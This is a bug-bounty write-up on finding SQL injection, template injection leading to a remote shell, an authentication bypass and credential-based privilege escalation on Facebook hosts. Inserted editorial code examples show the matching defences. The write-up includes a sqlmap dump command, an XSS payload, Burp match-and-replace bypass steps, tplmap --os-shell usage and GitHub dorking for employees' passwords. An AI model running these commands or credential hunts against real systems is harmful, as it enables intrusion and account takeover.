How I Found Multiple Bugs On Facebook In 1 Month And a Part Of My Methodology & Tools

Hey Hunters, Hello Infosec Community

I am Orwa [https://twitter.com/GodfatherOrwa]

This is my 2nd writeup; the first one is about Full Map To Github Recon And Leaks Exposure. I have seen many people getting hall of fames and bounties from Facebook. Aditi Singh, a smart girl, is the one who motivated me to work on this program [https://twitter.com/aditi_singghh]

As you see in the title, in this writeup I will speak about how I found, not what I found.

What matters to me here is for the reader to learn.

So I will talk about all my discoveries on Facebook, duplicate and accepted, and a part of my methodology.

Before starting:
Everything was done in cooperation with HackerX007.
He is a very smart and creative person. I suggest everyone follow him [https://twitter.com/XHackerx007]

HackerX007 is also on the Bugcrowd leaderboard rankings: Top 10 on P1, Top 100 in the full ranking.

A: What The Multiple Bugs Are That I Found

1 Server-Side Template Injection To RCE (Critical)

2 SQL Injection [2] (Critical)

3 Authentication Bypass (Critical)

4 Privilege Escalation (Critical)

5 Multiple Reflected XSS (Medium)

B: Tools And Extensions You Need

1 FFUF or Dirsearch, I like both

2 A good wordlist; for me I like to use the legend Random Robbie's wordlist https://github.com/random-robbie/bruteforce-lists

3 Amass for subdomains. I also check on GitHub for subdomains, and you can also fuzz for subdomains by using a good wordlist. The good commands that I use for Amass:

  • For a list of domains ==> amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txt
  • For a single domain ==> amass enum -passive -norecursive -noalts -d domain -o subs.txt

4 Httpx and httprobe and Nmap

5 Wappalyzer extension

6 Burp Pro with these extensions

  • Collaborator Everywhere
  • XSS Validator
  • Wsdler
  • .NET Beautifier
  • Bypass WAF
  • J2EEScan
  • Param Miner
  • Wayback Machine
  • JS Link Finder
  • Upload Scanner
  • Nucleus Burp Extension
  • Software Vulnerability Scanner
  • Active Scan++

7 Acunetix Scanner, or if you are looking for something free and cool, reNgine

C: How I Found Multiple Bugs

1 On the First Domain

SQL Injection [2] & Authentication Bypass & XSS [2]

I started my recon by checking for some cool domains by dorking for Facebook pages on GitHub (dorking to find domains and some cool endpoints).

So what dorks did I try:

  • org:facebookresearch ftp
  • org:facebookresearch Ldap
  • org:facebookresearch https://
  • finally, after about 30 min of dorking, the last dork, which I still remember:

org:facebookresearch language:python .php

I got lucky and found an interesting endpoint; it was

domain/login/_ajax/verify-2fa.php

When I visited this domain it was an employee panel owned by Instagram.

I directly started looking for SQL injection: the test query 1' errored back with `MySQL`, so now the parameter username looked vulnerable.

So in Burp I intercepted the request and made a copy in a txt file.

On sqlmap I ran this command:

sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname

and BooM, it's done.
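Added example (editorial, not code from the writeup or from the panel that was tested): why a single quote in the username parameter produced a database error, and what the parameterised fix looks like. It uses an in-memory SQLite table with a constructed sample user instead of the MySQL backend the post describes, so the error text differs, but the mechanism is the same: in the string-built query the quote becomes part of the SQL grammar, while the bound parameter is only ever treated as data.

```python
# Editorial example: the defect behind a "1'" probe returning a database error,
# next to the parameterised form that treats the same input as plain data.
# SQLite (stdlib) stands in for MySQL; the users table and its row are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throw-away users table with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")  # constructed sample
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: user input is spliced into the SQL text itself."""
    query = ("SELECT 1 FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values, so quotes are never parsed as SQL."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def probe(conn: sqlite3.Connection, login, username: str, password: str) -> tuple:
    """Run a login function and report ('ok', result) or ('error', message)."""
    try:
        return ("ok", login(conn, username, password))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, input 1':", probe(db, login_vulnerable, "1'", "x"))  # error
    print("safe, input 1':      ", probe(db, login_safe, "1'", "x"))        # ('ok', False)
    print("safe, real creds:    ", probe(db, login_safe, "alice", "s3cret"))  # ('ok', True)
```

The error branch of `probe` is the server-side symptom the post saw reflected back as `MySQL`; a hardened application both binds parameters and returns a generic error page, so the database engine name and query fragment never reach the response.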

So after that I `spidered` the full host and fuzzed for `php` using a php wordlist, and after that ran Active Scan on Burp for all the POST requests.

`Keep the maximum insertion points per base request at 10`

What I found:

  • another SQL injection
  • 2 XSS, payload:
"><img src=x onerror=alert(1)>

The SQL injection was closed as duplicate because the security team already knew about it and were working to fix it; also XSS: 1 duplicate and 1 accepted.

Here HackerX007 messed around a bit;
as he is also an artist with manual testing, he found a very cool Authentication Bypass.

Authentication Bypass that allows an unauthenticated user to take actions. When you visit domain/location/?5 you will be redirected to the login page, but in Burp, when visiting it, one will be redirected, but the Content-Length of the redirect response is so big: 6443. After looking in the response he found out that in this 302 response, the panel was there without any authentication, in the 302 response content.
So after some playing with Burp match and replace it was possible to bypass authentication and take some actions. At first I thought it's just a front-end bypass, but I found out I can take actions, like enable / disable Bucket.

#Repro Steps
1. In Burp match and replace add this:
type: response header
match: HTTP/1.1 302 Found
replace: HTTP/1.1 200 ok
__
type: response header
match: Location: ../login/?redirect=//location/?5
replace:
2. Now go to domain//location/?5
3. BooM
4. When you are done you can [Logout] 😂

This Authentication Bypass was accepted.
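Added example (editorial, not code from the writeup or from the affected panel): the server-side defect behind this bypass is a redirect response that still carries the protected page in its body, which is why a Content-Length of 6443 on a 302 stood out. The Python below models a vulnerable handler that renders the page and only then decides to redirect, next to a fixed one that checks authentication first and returns an empty body, and adds a check a defender can run over captured responses to flag 3xx replies with oversized bodies. The handlers, session dicts, page text, URLs and response records are all constructed for illustration.

```python
# Editorial example: a redirect that leaks the page it is supposed to protect,
# the early-return fix, and a check for such responses in a proxy export.
# Everything here is constructed; only the redirect target and the 6443
# Content-Length are taken from the writeup.

PROTECTED_PAGE = "<html><body>Admin panel: manage buckets, users ...</body></html>"
LOGIN_REDIRECT = "../login/?redirect=//location/?5"


def handle_vulnerable(session: dict) -> tuple:
    """Renders the panel first and only afterwards decides to redirect.
    The status becomes 302, but the rendered page is still sent as the body,
    so anything that ignores the status line (or rewrites it) gets the panel."""
    status, headers, body = 200, {}, PROTECTED_PAGE
    if not session.get("authenticated"):
        status = 302
        headers["Location"] = LOGIN_REDIRECT
    return status, headers, body


def handle_fixed(session: dict) -> tuple:
    """Checks authentication before doing any work and returns an empty body.
    Rewriting the status line on the client now yields nothing to read."""
    if not session.get("authenticated"):
        return 302, {"Location": LOGIN_REDIRECT}, ""
    return 200, {}, PROTECTED_PAGE


def redirect_body_leaks(responses, max_body: int = 512) -> list:
    """Flag 3xx responses whose body is larger than a short redirect stub.
    `responses` is a list of (url, status, body) tuples, e.g. from a proxy export.
    Returns (url, status, body_length) for each suspicious response."""
    findings = []
    for url, status, body in responses:
        if 300 <= status < 400 and len(body) > max_body:
            findings.append((url, status, len(body)))
    return findings


if __name__ == "__main__":
    anonymous = {}  # constructed session with no authenticated flag
    print("vulnerable:", handle_vulnerable(anonymous)[0], "bytes:", len(handle_vulnerable(anonymous)[2]))
    print("fixed:     ", handle_fixed(anonymous)[0], "bytes:", len(handle_fixed(anonymous)[2]))
```

Running `redirect_body_leaks` over an exported proxy history is a quick regression check after the fix: a 302 to the login page should carry at most a few hundred bytes of boilerplate, never the full panel.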

2 SHODAN IP And SSTI To RCE

I started recon for IPs belonging to Facebook.

The good dorks you can use in this case:

If you are looking for domains or IPs belonging to the program:

Org:"FaceBook Inc." (without 200; no need for live IPs in this case)

If you are looking for cool subs or IPs on the domain:

Ssl.cert.subject.CN:"facebook.com" 200

So I found an interesting IP that included port 10000, but it was not working.

So I scanned that IP on Nmap: nmap -sV ip

It showed port 8443 open.

When I checked it [it's an AWS host owned by Facebook].

Now I collected a lot of IPs like these and sent them to scan on Acunetix, running in the background.

After about 1 hour I came back to check Acunetix; it showed this IP vulnerable to SSTI, and the payload was set in the parameter mode, which calls debug in Python. So I tried the normal payload {{5*5}} and found 25 in the source. The easy and fast way to check here is to use the tplmap tool; it's similar to sqlmap. To install:

git clone https://github.com/epinna/tplmap.git

After testing this parameter it showed it is vulnerable to SSTI.

So my command was:

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"

===>

GET parameter: mode
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render

What made me happy here is that

python code evaluation is OK

that means I can

execute commands on shell
and
bind and reverse shell
and
file write and read
but not in all the cases

So what I needed was only to connect to a shell:

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell

I only checked id and pinged Burp.

BooM

This SSTI was accepted.
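Added example (editorial, not from the writeup): a defender-side check for the kind of probe described in this section. The finding started with {{5*5}} sent in the mode parameter and 25 coming back in the page, so the cheapest detection is to look for template-expression delimiters in the decoded query parameters of access-log lines, including values that were URL-encoded twice. The log lines are constructed; only the /consent path and the parameter names come from the tplmap command above, and the delimiter list goes beyond Jinja2 to the other common engines.

```python
# Editorial example: spot template-expression probes in access logs.
# Log lines are constructed in combined-log style; /consent and the parameter
# names are taken from the writeup's tplmap command.
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Opening and closing delimiter pairs of common engines: Jinja2/Twig {{ }} and
# {% %}, Freemarker/Velocity/EL ${ }, Mako/ERB <% %>. Requiring the closing
# pair keeps a stray brace in ordinary input from firing.
TEMPLATE_PROBE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>", re.S)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def suspicious_params(target: str) -> list:
    """Return (param, decoded_value) pairs whose value looks like a template probe."""
    query = urlsplit(target).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decoding again catches %257B-style
            # double encoding that a naive filter on the raw line would miss.
            decoded = unquote_plus(value)
            if TEMPLATE_PROBE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_access_log(lines) -> list:
    """Scan log lines; return (line_no, path, [(param, value), ...]) for each hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group("target")
        hits = suspicious_params(target)
        if hits:
            findings.append((number, urlsplit(target).path, hits))
    return findings


SAMPLE_LOG = [  # constructed lines; the second mirrors the {{5*5}} probe
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug HTTP/1.1" 200 6102',
    '10.0.0.5 - - [01/Jan/2021:10:00:05 +0000] "GET /consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=%7B%7B5*5%7D%7D HTTP/1.1" 200 6099',
    '10.0.0.7 - - [01/Jan/2021:10:00:09 +0000] "GET /consent?mode=%257B%257B7*7%257D%257D HTTP/1.1" 200 6099',
    '10.0.0.9 - - [01/Jan/2021:10:00:12 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for line_no, path, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} {hits}")
```

A hit on a parameter that is then echoed into the page is the combination to escalate on: the root-cause fix is to pass user input to the template as a context variable rather than rendering it as template source, and the debug mode the post mentions should not be reachable from the request at all.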

3 Privilege Escalation

Here I visited crt.sh to take about 5 interesting domains:

https://crt.sh/?q=Facebook+Inc.

But for subdomain gathering I didn't want the normal way.

I fuzzed for subdomains with a good and big wordlist I made.

You can also make one for yourself.

After that, I filtered to live hosts using httprobe:

cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt

So I found here a domain running on port 10000.

When I visited it, it was an interesting panel for managing servers and a lot of other things.

When I checked, it ran with a lot of technologies.

I ran dirsearch on the panel and, wow, a misconfiguration: some endpoints are accessible without any login. OK, it's a cool find to report, but still

without any privilege like edit, delete, add, etc.

So I needed to keep working to find something good.

  • I also tried logging in with some default credentials, but it didn't work; I also tried to sign up, but registering can't be done without logging in with admin credentials.
By checking some endpoints I found server info, and with that info the full name of the admin who created it.

So it took 5 min to find that employee's repo on GitHub.

So I started dorking on the employee's repo for any password.

I tried:

password
passwd
pwd
pass
pw
login

Found an internal host and user and password in a GitHub leak like this:

$host = ************
$User = ************
$pwd  = ************
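Added example (editorial, not from the writeup): a small pre-commit style scanner for the credential-assignment pattern shown above. It flags assignments whose variable name contains one of the keywords the post searched for (password, passwd, pwd, pass, pw, login), plus host and user so the whole triple is caught together, and reports file, line and a redacted value so the secret itself never gets copied into a ticket. The PHP-style sample file is constructed; no real host, user or password appears in it.

```python
# Editorial example: catch "$pwd = '...'"-style credential assignments before
# they are committed. The sample config below is constructed.
import re

# Keywords from the writeup's search list, plus host/user to catch the full triple.
KEYWORDS = ("password", "passwd", "pwd", "pass", "pw", "login", "host", "user")

# Matches $pwd = "..."; pwd = '...'; PWD=...; key: value (PHP, Python, shell, YAML-ish).
ASSIGNMENT = re.compile(
    r"""^\s*\$?(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*(?P<quote>['"]?)(?P<value>[^'"\s#;]+)(?P=quote)""",
    re.M,
)
PLACEHOLDERS = {"changeme", "xxx", "<redacted>", "none", "null", "example"}


def redact(value: str) -> str:
    """Keep two leading characters so a finding is recognisable, never the whole secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)


def find_credentials(text: str, filename: str = "<mem>") -> list:
    """Return (filename, line_no, name, redacted_value) for each suspicious assignment."""
    findings = []
    for m in ASSIGNMENT.finditer(text):
        name = m.group("name")
        if not any(keyword in name.lower() for keyword in KEYWORDS):
            continue
        value = m.group("value")
        if value.lower() in PLACEHOLDERS or set(value) <= {"*"}:
            continue  # already masked or an obvious placeholder
        # Count newlines before the variable name so a blank line above does not shift the number.
        line_no = text.count("\n", 0, m.start("name")) + 1
        findings.append((filename, line_no, name, redact(value)))
    return findings


SAMPLE_CONFIG = """<?php
// constructed sample config, not a real leak
$host = "db.internal.example";
$User = "svc_backup";
$pwd  = "Winter2021!";
$debug = true;
$api_pass = "********";
"""

if __name__ == "__main__":
    for finding in find_credentials(SAMPLE_CONFIG, "config.php"):
        print(finding)
```

Wire `find_credentials` into a pre-commit hook or a CI step that walks the changed files; the `********` case shows why the scanner skips values that are already masked, which is exactly how a leaked config looks after it has been cleaned.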

Scanned the internal host for ports: nothing open.

So I tried to log in using the username and the password and BooM 😎🥳 it worked with full privilege.

After login I could:

Full access and control
add users
del users
Etc...

Also 1 stored XSS in this panel 😎

I hope you guys have enjoyed the reading

and hope you learn and find bugs and tweet about it for me; that will make me happy.

Stay safe, dears.

I am not good at writeups; if there are spelling mistakes, please overlook them.

The biggest lie
is when they tell you: it's not simple.
If someone tells you it's not simple, 90% will give up.

Everything in this life is simple,
it just needs 2 things:
1- No matter what happens ==> Never ever give up

2- Arrange your work, arrange your life, arrange your time.
Do not work in any field in life in a random way.

Thanks all

https://twitter.com/GodfatherOrwa

Don't forget to also follow HackerX007; I suggest everyone follow him.

https://twitter.com/XHackerx007